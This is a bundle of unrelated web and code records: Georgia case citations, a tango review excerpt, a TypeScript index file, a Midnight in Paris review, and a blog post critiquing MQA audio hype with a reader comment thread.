[5] See Duck v. State, 250 Ga. 592, 597(3), 300 S.E.2d 121 (1983).
[6] Id. at 598(3), 300 S.E.2d 121; Blige v. State, 205 Ga.App. 133, 135(4), 421 S.E.2d 547 (1992).
[7] See Towns v. State, 197 Ga.App. 786, 787(2), 399 S.E.2d 561 (1990).
[8] See Tucker v. State, 222 Ga.App. 517, 518(2), 474 S.E.2d 696 (1996) (motion to suppress should be filed before trial).
[9] See Smith v. State, 165 Ga.App. 333, 334(1), 299 S.E.2d 891 (1983).
| mini_pile | {'original_id': '4d58dcaa6ace4002b43340ee697db48bf0719a25a4ccd7cfeae73e809bb8c0ef'} |
Tag Archives: German Cornejo
Tango Immortal @ Sadler’s Wells Review
As a long time admirer of Tango I have always found myself drawn to its versatility; what initially attracts me to this particular style of dance is how it is capable of so many emotions and how despite the rigid rules and etiquettes of its nature, Tango does not have to be inherently sexual or overtly flash. It is a dance that can be shared by two of the same gender, or a couple with a vast age difference, and what I have always loved is how in the moment of that dance, there is a great amount of context and respectively, expression.
Tango Immortal
Continue reading
Tagged , , , | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '0', 'language_id_whole_page_fasttext': "{'en': 0.940903902053833}", 'metadata': "{'Content-Length': '49814', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:FJWFRIOSDFHMUKRVZOQZ4AMK3GBAG7JY', 'WARC-Concurrent-To': '<urn:uuid:8271673e-3ed2-41ee-8e99-4f72cb88f6ad>', 'WARC-Date': datetime.datetime(2020, 6, 2, 21, 7, 28), 'WARC-IP-Address': '192.0.78.13', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:IUWLSBE2X737ZJ6Z4IGVZHYI6M6F2RHV', 'WARC-Record-ID': '<urn:uuid:e2649a09-8122-4c30-b26c-dc13179e24a6>', 'WARC-Target-URI': 'https://theatrefullstop.wordpress.com/tag/german-cornejo/', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:e6695b38-7303-4d88-9f20-977492c3829d>', 'WARC-Truncated': None}", 'previous_word_count': '116', 'url': 'https://theatrefullstop.wordpress.com/tag/german-cornejo/', 'warcinfo': 'isPartOf: CC-MAIN-2020-24\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May/June 2020\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-236.ec2.internal\r\nsoftware: Apache Nutch 1.16 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.1-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: http://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.035623908042907715', 'original_id': '3b1416d406d69bd0a5672a3be073d5269c3a33041fe482b369070d03b5a48055'} |
export * from './AuthStore'
export * from './TokenStore'
| common_corpus | {'identifier': 'https://github.com/ghostslayer989/salad-applications/blob/master/packages/web-app/src/modules/auth/index.ts', 'collection': 'Github Open Source', 'open_type': 'Open Source', 'license': 'MIT', 'date': '', 'title': 'salad-applications', 'creator': 'ghostslayer989', 'language': 'TypeScript', 'language_type': 'Code', 'word_count': '8', 'token_count': '17', '__index_level_0__': '53072', 'original_id': 'f90fe9b5a5a38061660c06bfbb4637556fbeb48f0ec9229ad8774fdc5065b90d'} |
Midnight in Paris Woody Allen
Midnight in Paris Woody Allen
In form and execution, Midnight in Paris is much like a rudimentary, but intriguing academic essay, set up with a thesis, arguments and a logical conclusion, with minor wit and comedy sprucing up its undisguised and overt agenda. The topic du jour is that of nostalgia and its use as an idealized crux for those unable to cope with their present life.
It's presented through successful-cum-hack screenwriter Gil Pender (Owen Wilson), whose euphuistic apotheosizing of '20s Paris while visiting exacerbates and magnifies his current struggle to write a great novel that would, in theory, boost his status from indelicate Hollywood puppet to legitimate writer. His fiancée, Inez (Rachel McAdams), has no such illusions about the past or Paris, much preferring the glitz and immediate gratification of the California lifestyle, idealizing instead her pedantic professor "bestie," Paul (Michael Sheen).
This obvious counterbalance is made peculiar by the central premise and supernatural element, wherein Gil is able to travel back to the '20s at the stroke of midnight to banter with Ernest Hemingway (Corey Stoll) and F. Scott Fitzgerald (Tom Hiddleston). He also receives literary criticism from Gertrude Stein (Kathy Bates) and strikes up a flirtation with art groupie Adriana (Marion Cotillard), whose nostalgia for the Belle Époque period fleshes out the formula by making Gil confront his own delusions.
This structure, along with much of the quick-paced, theatrical dialogue, propels Allen's latest European diversion with sheer character dynamics and familiarity intrigue. It's fun to see Wilson try his damnedest to make the pompous Sheen look stupid and to see Zelda Fitzgerald (Alison Pill) behave erratically, while Luis Bunuel (Adrien de Van) acts confused when confronted with the premise of The Exterminating Angel.
It's just that the excess indulgence and meandering plotlines that take place in the '20s tend to drag on well after their purpose has been served, making the film itself sort of hypocritical, scoffing at the male tendency to idealize times past while itself perversely embellishing its past with a fetishistic fascination. (Mongrel Media) | dclm_baseline | {'bff_contained_ngram_count_before_dedupe': '1', 'language_id_whole_page_fasttext': "{'en': 0.926764965057373}", 'metadata': "{'Content-Length': '202205', 'Content-Type': 'application/http; msgtype=response', 'WARC-Block-Digest': 'sha1:FS5DPQXG5D3O2E4W7JITEFKOYTDBI45R', 'WARC-Concurrent-To': '<urn:uuid:9c107e4b-83de-4210-9d65-1fde20965564>', 'WARC-Date': datetime.datetime(2021, 5, 11, 10, 43, 47), 'WARC-IP-Address': '104.25.93.20', 'WARC-Identified-Payload-Type': 'text/html', 'WARC-Payload-Digest': 'sha1:UYD46A7OBOLFZ35WFSB566AXNNTH5M5G', 'WARC-Record-ID': '<urn:uuid:8b717b94-2f4b-488b-91fb-24303dbd27d6>', 'WARC-Target-URI': 'https://exclaim.ca/film/article/midnight_in_paris-directed_by_woody_allen', 'WARC-Type': 'response', 'WARC-Warcinfo-ID': '<urn:uuid:92505f14-c050-4245-bff9-cd6127beba3e>', 'WARC-Truncated': None}", 'previous_word_count': '331', 'url': 'https://exclaim.ca/film/article/midnight_in_paris-directed_by_woody_allen', 'warcinfo': 'isPartOf: CC-MAIN-2021-21\r\npublisher: Common Crawl\r\ndescription: Wide crawl of the web for May 2021\r\noperator: Common Crawl Admin (info@commoncrawl.org)\r\nhostname: ip-10-67-67-184.ec2.internal\r\nsoftware: Apache Nutch 1.18 (modified, https://github.com/commoncrawl/nutch/)\r\nrobots: checked via crawler-commons 1.2-SNAPSHOT (https://github.com/crawler-commons/crawler-commons)\r\nformat: WARC File Format 1.1\r\nconformsTo: https://iipc.github.io/warc-specifications/specifications/warc-format/warc-1.1/', 'fasttext_openhermes_reddit_eli5_vs_rw_v2_bigram_200k_train_prob': '0.03293120861053467', 'original_id': 'f542c79f107a2dd328e3fee8dc87ace4d0a7a06a30d797f0ddeed7aea341f7a0'} |
Saturday, 14 October 2017
MQA: "Final" thoughts... On Politics & Paradigms.
Cartoon looks about right and reflective of MQA... From article here.
In the last few weeks as I was preparing the series of posts discussing the MQA blind test, I noticed The Absolute Sound (TAS) ramping up the hype again in September with two articles in defense of the value of MQA. Let's use those articles to close off discussions about MQA among other ideas at least for a bit here at The Musings...
Sure, I'll be around to add my two bits and answer questions where I can, but to be honest, I'm a little tired of MQA by this stage and how much of a big deal it isn't, IMO.
First, consider the TAS article "The Politics of MQA" by Andrew Quint. I found the title appropriate but not so much the opening sentence: "The codec known as MQA (Master Quality Authenticated) is clearly in its ascendancy." Are we sure about that?
You see, I agree very much about the title because really it's about politics. It's about influence, control, and money. MQA is a business, it needs to generate revenue, and to do so it must gain adoption of course. In contrast, the average audiophile when presented with another "new format" cares about the utilitarian aspects of what is presented (actual sound quality potential) and value from the purchase if adopted. The frustration I think this new file type brings is a result of this dissociation. The company and mouthpieces insist that they have produced a "technology" of value because it brings the "studio sound" home, that it's "revolutionary", that it embodies a new "paradigm" (more below), and that we will find benefit. It does this with ostensibly something significant - temporal "de-blurring". But for audiophile consumers, it's hard to imagine what the company, advertisers, and promoters are talking about... Where is the "blurring" exactly to begin with? On what scientific basis (for those who wonder about these things)? Even if true that the technique improves temporal accuracy in a certain way, what evidence is there that this really is appreciable to music lovers (ie. where are the comparisons even in audio shows right from the start to show an openness and confidence in what's being sold)? From my perspective, looking at what has transpired as a whole, the sales job, whether from Bob Stuart or the audiophile press, clearly hasn't been engaging in a way I think things need to be in this day of vastly improved communications - especially when dealing with passionate and knowledgeable members of such a small hobby!
Remember that doubts about the claims made in the audiophile world are nothing new! Consider the context of audiophilia as a whole. After years of obviously questionable claims from "experts" in the audiophile media promoting mindless tweaks, crazy cables, and preposterous theories, is it any wonder that there would be "blowback" when consumers yet again are subjected to the aroma of more politics (and the attendant profit motive) rather than what we truly care about? Just some no-nonsense technological advancement which actually makes sense and can be presented without hyperbole.
"Experts in general are viewed with suspicion nowadays." Maybe this is more true these days overall, I don't know, but specifically in the "high end audio" world, why would anyone not question such "authority"? It's hilarious to see the next sentence advocating that readers have a look at Tom Nichols' book The Death of Expertise but conveniently not showing the full title - The Death of Expertise: The Campaign Against Established Knowledge and Why It Matters. Are MQA's claims "established knowledge", Mr. Quint? Are those who view MQA critically (presumably including my posts here) trying to dissuade anyone from scientific inquiry, exploration of empirical truths, or in any way undermining decades of engineering and scientific principles; you know... established knowledge?! Which group truly has the weaker critical thinking skills?
Here's another gem: "... the MQA critiques I've seen are conspicuously silent on the extensive psychoacoustic research that underlies the development of the codec..." Here too is another claim that MQA wants us to be impressed by. But it's simply not impressive because even MQA says little about the research they claim to be so influential! (For reference, I've discussed some of this research hereherehere and here over the years. Also, I see that MQA likes to reference a 2013 Oppenheim paper on how "Human Time-Frequency Acuity Beats the Fourier Uncertainty Principle" and yet there's this comment refuting claims worth considering thanks to the National Research Council of Canada.)
Yes, research can refine our understanding of the human hearing and perception organs, but let's not be naïve thinking that any of this research somehow has opened a doorway into remarkable levels of audible resolution. There are no major theories or psychoacoustic breakthroughs that high-fidelity equipment or file formats can suddenly exploit! [Consider over the years all the claims in the bizarro world that companies like Synergistic "Research", Machina Dynamica, Shun Mookcottage industry cables, questionable software, etc... operate in with their claims of sonic improvement based on incomprehensible science.]
The final comment I want to make about this article is this statement in the last paragraph: "Let’s face it: There are some audiophile elitists that are going to resent this challenge to their special status." Huh? Who are the elites in this fairy-tale opposing MQA? Are not those who promote "high end" products, those who have direct access to the manufacturers, those who believe that they are endowed with the gift of "golden ears" and can value the benefits of $10,000+ audio cables (like these "beauties" in your magazine) at least mouthpieces for these elites? In any event, I fail to see how this little codec which appears to make little empirical difference pose any challenge to one's pride in owning a nice, expensive sound system with all its non-utilitarian benefits. As if the megabuck elites would have any trouble coughing up a few thousand to upgrade a DAC should MQA actually take off. Specifically then, about whom are you referring to?!
As I said, I agree that MQA is political. With little to no evidence that it sonically makes a difference whether technically or empirically in listening tests, the only people that would gain from its adoption would be companies with a stake in obtaining influence and financial gain (primarily MQA Ltd.). Music labels would probably also prefer something like this so they don't need to release original "studio master" hi-res files (the "crown jewels" as discussed here) - saved for yet another remaster down the road.
As usual, lots of claims, opinions and allegations, no demonstration of facts from the politicians. Obviously embodied in the emptiness of this article.
Then there's "Let the Revolution Begin" by Robert Harley.
Hmmm, where shall I begin? Let's see, in the last 20 years, I have been an "early adopter" of many new technologies and media formats. I bought the first Creative Labs PC-DVD drive and decoder card on the market in the late 90's, purchased some of the first DVD's when they were still single layer flip disks, got into SACD with a Sony SCD-1 for awhile, bought a few DVD-A's but wasn't enthralled by the experience. I enjoyed both Blu-Ray and HD-DVD and still have an old Xbox 360 HD-DVD drive in storage. By the early 2010's, I started purchasing hi-res audio downloads for select albums that seemed to be of high resolution provenance.
In the last year I've been enjoying my 4K/HDR TV, bought my first UHD Blu-Rays, upgraded to an octa-core CPU, and in the last few weeks bought a new electric vehicle to replace my gas-guzzling car. In each of these recent purchases, I and the family experience obvious benefits... My kids clearly know which version of Planet Earth II they want to watch when given a choice between the 4K/HDR and 1080P, I know what CPU I'd want to use for encoding long videos to HEVC/H.265. It's great to know that I've driven more than a thousand kilometers already without burning any gasoline. Clearly my wife appreciates the new vehicle because we have to fight for the keys to the EV in the morning :-).
Would any of these tangible benefits be evident when it comes to choosing between MQA and another digital audio format at home (hi-res or otherwise, including high bitrate MP3)? Would my kids or wife make a deliberate decision to select an MQA-encoded album over a standard PCM? I can certainly say without reservation that this simply would not happen.
As audiophiles, in the last few decades, I think we've seen some genuine "revolutions". From a sound quality perspective, the switch from LP/vinyl/cassette to CD was a big one in the 1980's that got better over time as digital matured (at least with the albums that survived the loudness war). From the perspective of convenience, the CD allowed for high quality car playback, MP3 allowing for thousands of songs in the pocket, computer audio and storage provided high quality home access, and streaming with access to millions of tracks over the cloud are all worthy contenders for at least the adjective "significant", and "evolutionary" if not quite "revolutionary". Since the CD and 16/44 PCM encoding, we have already had our shot with a new encoding "format" paradigm. It is called SACD and DSD, and it's still with us though on life support with few new releases. But we know it was not "revolutionary" in how it impacted sound quality (nor did it add anything to convenience although multi-channel was nice). How could it when 2-channel CD sound quality was already excellent (yes, the Sony and Philips engineers did their homework more than 30 years ago).
DSD with multi-megahertz sampling rate already provided very high frequency response and excellent time domain qualities as per nice looking impulse-response graphs touted by the MQA folks to be important. Yet clearly these were not enough to overcome the barriers to mass adoption in the marketplace. In fact, DSD64 has even better dynamic range and lower noise floor than MQA in the audible spectrum. Sure, we can put some blame on the marketing approach and possibly other poor business decisions made by Sony and partners, but this doesn't excuse the core issue of limited differentiable audibility for human consumption.
MQA as typically found on TIDAL is a 24/44 or 24/48 PCM stream with a lossy-encoded piece embedded in the least significant bits in much the same way as HDCD embedded instructions under the expected noise floor with 16/44 PCM. The other part to this scheme is of course the 16 customized upsampling filters as demonstrated by the AudioQuest Dragonfly Black's measured impulse responses.
In comparison to a jump from 16/44 PCM CD to multi-megahertz sampling rate 1-bit DSD (ie. SACD), how much of a "paradigm shift" is the jump from 24/96 to MQA as described in the previous paragraph? Mr. Harley speaks of the "'crisis' in which a 'battle' (Kuhn’s terms) breaks out between followers of the old and new paradigms" implying that it's happening right here and now. But the "crisis" (let's not be so dramatic - this is more a "disagreement") we're engaged in is not about science and demonstrable sonic enhancement but of politics as alluded to by TAS's own article above!
For Mr. Harley to frame this debate on a grand scale of Kuhn's scientific revolution is laughable and obviously hyperbolic. It damages further a magazine which IMO has little credibility when it comes to being able to show critical thinking and understanding of the technology (remember extremely strange articles like this?). It also exemplifies to the world the madness of audiophilia and the ineptitude of some of the "journalists" in this hobby among other technology-based enthusiast pursuits. These are the esteemed journalists that audiophiles are supposed to respect? This is the level of intellectual discourse we engage in to divine whether a new and "revolutionary" product honestly deserves attention (much less financial support)?
Notice how he spent many paragraphs creating the impression that MQA has embodied amazing breakthroughs in "the new psychoacoustic paradigm". Snapping twigs, cracking leaves, wind, rain, and running water have "no frequencies"! The hearing mechanism has bidirectional neural afferent/efferent pathways! Supposedly MP3 has "failed" in practice!
You see, these are all meaningless at best or erroneous at worst arguments. Yes, there are frequencies to be found when we record a twig snap :-). Nobody denies that humans are remarkably complex and as we understand more about the biological architecture, new neural network pathways will be found. No, MP3 has not "failed". In what universe is this man living in? If I had a role in creating MP3, I'd certainly be proud of the success over these decades! Considering that the vast majority of Internet streaming is still lossy, satellite Sirius XM radio is equivalent to 128-160kbps MP3, the local DJ "spins" MP3's at all the recent dance parties I've been to, and lossy audio continues to advance with codecs like Opus, there's nothing to be ashamed of. I'm obviously not saying that audiophiles should not embrace lossless audio or hi-res, rather, in the vast majority of situations, an MP3 of reasonable bitrate would be more than adequate to successfully encode the sound at a high enough resolution.
None of these arguments can be linked to anything MQA actually does. I need to point out that he is creating "straw men" arguments. Just because nerve fibers go this and that direction doesn't mean MQA makes anything better. Likewise, so what about MP3? The issue is whether MQA actually is better than lossless PCM and hi-res PCM. Ironically it is actually MQA itself that contains lossy elements in the compression algorithm, throwing out parts of the ultrasonic frequency felt to have no useful benefit. (Not that this is unreasonable BTW, just as it's not unreasonable for MP3 to toss out some data also for the sake of compression.)
Here's an interesting quote (bold emphasis mine):
So, here we are in 2017, with our digital-audio systems designed around first-generation paradigms of information theory (Nyquist-Shannon) and psychoacoustics (frequency-based, the ear as a linear and static device). MQA comes along and forges a new path, building on the advances in other fields and developing from first principles an entirely new way of looking at the question of how best to encode, distribute, and decode digitally represented music.
Wow, doesn't that sound just grand?! Let's rewrite that paragraph and create a realistic version of what MQA is:
So, here we are in 2017, with our digital-audio systems designed around tried-and-true paradigms of information theory and psychoacoustics. MQA is forging ahead with its proprietary, partially lossy compressed 24/44 or 24/48 PCM stream with a little bit extra to tell the DAC how it should dither and with which of 16 weak, poorly anti-imaging, upsampling reconstruction filters it should use embedded in the lowest few bits of data. The PCM stream is then typically losslessly compressed using an open-source FLAC encoder for delivery. It can then be streamed by TIDAL or downloaded as a file through typical Internet mechanisms.
On playback, the audio data is software decoded either on your computer or in your DAC with MQA-compatible firmware back into a reconstituted PCM hi-res stream at 24/88 or 24/96. From there, dither and/or noise shaping can be applied, then the embedded upsampling filter choice is used for final conversion to analogue.
Doesn't sound that grand any more when we describe what it actually does while taking out phrases like "first-generation paradigms", a "new path", "first principles", etc. Calling a spade a spade isn't nearly as romantic nor perpetuates the grandeur.
It's just odd to think that some in the media are so apparently taken with what amounts to faith in a DSP algorithm. And when others come along and try to demonstrate why it may be deserving of criticism, a grand conflict threatening the very foundations of scientific thinking gets invoked! We might as well drag Heaven and Hell, or virtue and sin into this earth-shaking dialogue. Is it any wonder that audiophiles sense this gross dissociation? Is it also not fair to ask why is it that folks who could benefit from industry incentives (not just financial incentives) seem to be so supportive of this "technology"? To not question these so-called "experts" who provide mere opinion would be obviously foolish!
To end off, I think it's important to remember what's happening here with MQA. In an unregulated free enterprise system, the arguments, tests, debates are necessary. The consumer is trying to figure out whether what is being sold to us has merit. In an age of free speech with online forums and blogs, the consumer has a powerful platform to express itself; much different from the landscape of years ago when magazines can print whatever they wanted with consumer discontentment expressed in the short "Letters to the Editor" section. It really doesn't help when the press - especially a publication like this one - appears so grossly one-sided and out of touch. As I have said before, I believe that the press should really be independent and aligned with consumer interests in mind. If in this day and age the audiophile press is nothing more than the advertising arm of an industry, then let's be transparent about that as well.
We expect that the MQA/Meridian company will spend money on partnerships, buying advertising space, and whatever forms of influence it feels it needs (politics). If there is truly merit, MQA could reap rewards... If not, they've wasted a lot of money and time on a potentially risky direction which could have been engaged productively in many other ways to build the company and its products. Through all of this, the pressure remains on them to deliver.
I suspect we'll know how this goes by next year. Is MQA truly "clearly in its ascendancy", TAS?
For those who want to hear it directly from Bob Stuart - here's the man himself in a recent interview:
BTW: An interesting figure he mentioned is that MQA audio is "typically 15.85 bits" and "up to 17 bits" of resolution (31:05). He still claims that undecoded MQA is better sounding than CD because "de-blur" has been done to a certain extent already (30:18).
Here's the "MQA talk" given by Danny Kaey of Positive Feedback at last week's Rocky Mountain Audio Fest 2017 streamed by Chris Connaker (Computer Audiophile):
Overall not exactly a satisfying discussion about MQA at all. MQA is barely mentioned after the first few minutes. He's instead meandering into a rather low-level and unfocused rambling about all kinds of stuff ("let's pivot the conversation") of varying significance to hi-fi. Ultimately, the guy is saying "Technology moves on... Let's get behind MQA cuz it's the only train in town!" without any good reasons provided whatsoever. As usual, he only sees good in the sound of MQA (19:35); no apparent ability to show balance nor acknowledge criticisms.
He also claims that a guy from the 1950's showing up in a modern audio show would not be surprised by what he experiences (31:00), implying little change in the hobby over >50 years. What's this dude talking about?! What about ubiquitous stereo material and even multi-channel, all that digital tech from CD onward, computer audio hardware & software, room correction DSP, speaker designs of overall better quality than the 50's, thousands of albums on a NAS, streaming audio, mobile players, generations of headphone refinement, wireless connectivity? Honestly, a guy from the 1950's would be amazed by the upgrade in fidelity, convenience, and often reasonable price tags (as well as audacious price tags) he would find. And that's just on the equipment side - imagine all the different genres of music, unique sounds, studio effects he would have to catch up on! Increase in audio fidelity might not be as impressive as the jump from B&W TV to a 4K/HDR massive flat-panel, but let's not be so devaluing of audio technology's evolution over the decades!
It's hilarious seeing that back-and-forth "yes / no" exchange on whether music producers/musicians/conductors could insist on how music is heard like Christopher Nolan and Quentin Tarantino insisting on the cinematic experience (32:30). It's one thing for a movie director to say that theaters have to meet certain criteria of video resolution and audio capability (there are all kinds of standards in place from THX to IMAX for decades), but who can insist, much less enforce, how one must listen to music a certain way at home or what equipment you use!? What a joke... The audience is right - NO. I'd be happy if a favored artist even had the power to request that their album not be overly dynamically compressed when being mastered.
There's more I can point out, but at the end of the day, clearly the audience members "get it". Have a look near the end of the talk at 1:04:30. The audience member is correct to imply that failure to expand hi-fi isn't just because of marketing, or just because the hi-fi industry "doesn't know how to say it well" in their advertising. You must have something of substance to sell when pushing the technology. Yes, Blu-Ray sells, and 4K sells. This is simply because these technologies have resulted in perceptible change compared to what came before in many situations. You cannot extract money from the consumer when they cannot differentiate a substantial improvement between CD and hi-res under most circumstances especially with yet another remaster of decades old material or new albums of poorly recorded/mixed/mastered quality; that's really all there is to it. I've said this since the beginning when discussing my "expectations" of Hi-Res Audio (and related discussion on value of Hi-Res Audio) which of course applies to MQA.
Considering that in recent years, we have already witnessed the demise of Neil Young's Pono, how many more Hi-Res Audio-based schemes must meet their wasteful end before the hi-fi industry moves on to something more worthwhile? If we were to write a book about 2-channel hi-res audio "formats", perhaps the first few chapters could be devoted to hardware playback of SACD and DVD-Audio. Somewhere in the middle would be the rise of computer audio, file-based media, and services like HDtracks and Qobuz. The last chapters of this 2-channel Hi-Res story might end up starting with the passionate madness of Neil Young, and perhaps mercifully ending in the calculated genius of Bob Stuart.
Well folks, I think I'm "good" with talking about MQA for a bit. That was certainly longer than I had initially intended! Unless there are truly new developments with this codec, I'll just linger. :-)
For the pop/rock lovers, I've been enjoying The Lemon Twigs' latest EP Brothers of Destruction. Also, Cécile McLorin Salvant's latest Dreams and Daggers [Live At The Village Vanguard] 2 CD set (DR11) sounds great if you like live jazz vocals. The new Avishai Cohen album 1970 was also a fun listen last night with some friends; essentially pop with a Middle Eastern world music flair (DR9 - a bit volume compressed, don't bother with the 24-bit version).
A few nights ago, I decided to spend an evening just listening to multi-channel music and was reminded of how amazing the 2015 multi-channel Blu-Ray version of Roger Waters' Amused To Death is (a very natural evolution for an album that helped demonstrate the abilities of Q-Sound back in the early 90's). Excellent sound engineering, deep ideas, and the spatial canvas of surround sound... Wish more albums were like this!
I'll be out of the country again for a bit. Will see if I have some material to post over the next few weeks.
Until next time, enjoy the music everyone...
1. Hello Archimago
Nicely written and cogently argued, as usual.
I'm ringing in fairly early to what I'm sure will be a lengthy thread because about four hours ago, I received a text message from Rt66indierock asking if my "ears [were] burning?" I knew what that meant and asked where the conflagration would be found. I should note that Steve (Rt66indierock) and I met and talked a couple of times at RMAF and chatted for an additional half hour by phone earlier this week. I respect him as an intelligent (if stubborn) advocate for his position, and I learned plenty.
I really don't feel it's fair to maintain that TAS is "ramping up the hype again" when it comes to MQA, as if the magazine was part of a coordinated promotional campaign. Both my editorial and Robert Harley's piece are responses to the vitriol that's been coming from those who feel MQA is ruining their lives, or at least polluting the sanctity of their worldview. This is clearly a hot button issue that really sets some people off. I've been writing for TAS for 22 years, until fairly recently mostly about music, musicians, recordings, and recording professionals. When one of those articles makes it up on line, it's unusual for there to be more than a few comments; in fact, if it's a record/CD review, zero comments is more like it. Last time I looked my piece had 150 comments and Robert's had 154. So, the topic has been politicized in the way that climate change or vaccine/autism connections have been politicized. There's been a lot more heat than light generated—but that's not the doing of the main audio magazines.
It's also not fair to conflate the intellectual rigor seen with some of the kooks along for the ride in this hobby with that of the best journalists, people like the editors of the two leading print magazines for audiophiles. Robert and John are definitely not your magic dot types and it's disingenuous to lump their work of the last 30 years in with "obviously questionable claims from 'experts' in the audiophile media promoting mindless tweaks, crazy cables, and preposterous theories." These guys are experts in the sense that Nichols means and they've been disrespected in the manner Nichols is talking about. Even if they are coming down on the side of a new/controversial technology (and I'm not so sure that MQA is viewed as the kooky/dishonest enterprise among rank-and-file audiophiles that you believe it to be), they are still experts. Harley and Atkinson's expertise is not defined by their position on MQA, no matter if you feel they are right or wrong and, last weekend in Denver, I definitely got a sense that many well-informed enthusiasts felt they were being treated poorly by a small number of loud, rude individuals out in the blogosphere.
As far as psychoacoustic research goes: fine, lets argue the points in a measured fashion. To name some of the more out-there corners of the industry (like Shun Mook or Synergistic) is adding a straw dog element to the discussion that can distract intelligent observers from having an important discussion about the capacities of human hearing and their relevance to the recording arts.
Lastly, please understand what "elitist" in the final paragraph of the editorial means. There are plenty of "elitists" that are readers of TAS, I am sure—but being one is not defined by the cost of your interconnects. It's defined by an often mean-spirited inflexibility when it comes to the opinions that upset your applecart. It's this panicy flailing-about caused by an idea that's outside of convention that Robert is addressing when he refers to the Kuhn book.
1. Hello Andrew,
Thank you for the comments and I certainly appreciate you taking the time to discuss these matters. Indeed as you noted in the responses to your editorial, MQA has struck an extreme chord in the audiophile community, which IMO is understandable based on the claims being made and the obvious questions raised.
I appreciate that your article and Mr. Harley's came out at the same time and that this is not a coordinated effort. That's fine. However, I'm also not sure if it would be accurate to characterize MQA as "ruining lives" or that there is any "sanctity" of worldviews being damaged. Yes, tempers can become inflamed, and arguments get overly heated on-line, but I'm not seeing severe hostility such that anyone would be fearful of their lives!
Let me ask you this, Andrew... I'm curious as to what "vitriol" you felt was so unfair that you needed to write the editorial in support of MQA? As you said, for 22 years you've been writing about musicians, albums, music, etc. I've read some of your articles and appreciate many of them.
Ultimately, I do not understand based on technical grounds what is so remarkable or valuable in MQA that's worth strongly defending. I'm not sure I see MQA as "dishonest". I simply see it as a business trying to make money. I agree that it offers file size compression, and I have shown that the sound quality is equivalent to hi-res PCM. But I do fail to see evidence of claimed sonic superiority. Does this automatically mean I think they're "dishonest"? No. Because these things are complex.
2. Now let's talk about the bigger issue of the audiophile press beyond MQA. The "straw dog" as you put it in regards to the connection between the press and questionable products.
First, I have respect for John Atkinson. I haven't searched through my >200 blog posts but I don't believe I've been flippant or dismissive of what he does in Stereophile. I certainly appreciate him maintaining objective testing in the magazine and have praised him for that. In fact, his exposé of MQA back in late 2014 was one of the best brief technical introductions that I found intriguing. I certainly do not envy either John or Robert for the difficult positions they have as editors straddling the needs of the industry and the interests of consumers. However, I think you can also appreciate the deep disappointment many in the audiophile community must be feeling when you see the battles raging. Clearly, a significant proportion of audiophiles feel that this hobby has become a laughing stock of technologically/engineering based pursuits. What other hobby has people like James Randi offering challenges with a monetary prize for a blind test? What other hobby with the core utilitarian goal being of an engineering nature have widespread claims in the official press agreeing with scientifically improbable outcomes on a routine basis and willing to extol the virtues of very expensive products? (Audibility of $$$ ethernet cables come to mind.)
Even if you say that Robert and John are "not your magic dot types" compared to the likes of Shun Mook or Synergistic, have they ever come out and said they didn't believe the claims of many/most of these kinds of products? In response to years of criticism by many audiophiles, where are the investigations into concerns raised especially over the years as costs of items escalate along with ridiculous claims passed over by the magazine editors and writers? "Errors of omission" can be just as bad and as I noted above, makes the audiophile hobby look ridiculous in the eyes of the public when mainstream audiophile publications cannot take a stand on some of the most questionable claims or products!
As for elitism. Fine, I guess you're referring to some kind of stubbornness or close-mindedness instead of the usual definition of entitlement or superiority. I don't know who's in a state of panic or who's "flailing-about" here... Genuine concern should bring with it some level of emotional response in any event.
It is unfortunate that some feel badly treated by rude comments made on the "more objective" side of debates. Having participated on many forum discussions over the years, I know that it goes both ways. I agree, it does not have to be that way.
3. Robert and John are definitely not your magic dot types " Well, Robert has written pseudoscientific nonsense about the 'sound' of cables being dependent on the directional properties of copper crystals. He's written this ignorant nonsense about how FLAC works: ""...Claiming a sonic difference exists between two 'identical' bitstreams may appear to be the height of audiophile lunacy, but there's a rational explanation for why FLAC files sounds (sic) inferior: The file must be decompressed on the fly during playback, a process that many computer-audio experts believe degrades fidelity." He's a clown at best and a shyster at worst.
4. Hello again, Archimago
A few more comments in response to your post above, if you'll permit.
I apologize for attempting to add a little mirth. By noting that this debate has been "ruining lives" and has "questioned the sanctity" of some "worldviews" I meant to underscore that the level of outrage about MQA is a bit out of proportion. From reading your blog, I've developed the impression that your regular work is connected to health care or pharmaceuticals. Me too. And I think we share a sense of proportionality, even though we are both pretty passionate about the point of intersection of art and technology that is high end audio.
Elitism? Not a comment by you, of course, and not on your blog—but rather one made in response to Robert Harley's "paradigm shift" piece on our site. Robert had listed his qualifications, beginning with his degree in audio engineering. The sneering response from an online assassin:
"A degree in recording engineering is generally considered to be superfluous to the requirements of the job - a bit like a degree in car mechanics. It doesn't mean much in areas higher math are a baseline requirement."
Note that training in electrical engineering is equated to training in auto mechanics. I wonder how all those well-trained mechanics that got vocational training (with a degree!) would feel about that comment. Talk about "elitism"!
James Randi is an interesting person to bring up in this context. My good friend and fellow TAS (music) writer Art Lintgen can identify LPs by the groove patterns he sees when holding the disc up to the light. I've seen him do it many times and he did on TV in Great Britain with no less than Georg Solti picking the records. Randi came by Art's office one day 20 years ago with a box of records to "debunk" Art's ability and left convinced that Art wasn't tricking anyone. Randi also very much misrepresented what happened when Michael Fremer agreed to a challenge to identify cables blind ( I'm not sure that Randi is the best arbiter of what represents hucksterism in high end audio. Do you truly doubt that Fremer can tell Monster cable from some megabucks brand? That's a bet I'd like to take.
In terms of vitriol, for an example we don't need to look any further than the post above. (I sure hope this isn't the Steve I met at RMAF last weekend.) Referring to Robert Harley he says:
"He's a clown at best and a shyster at worst."
Do you have any responsibility to moderate comments like that?
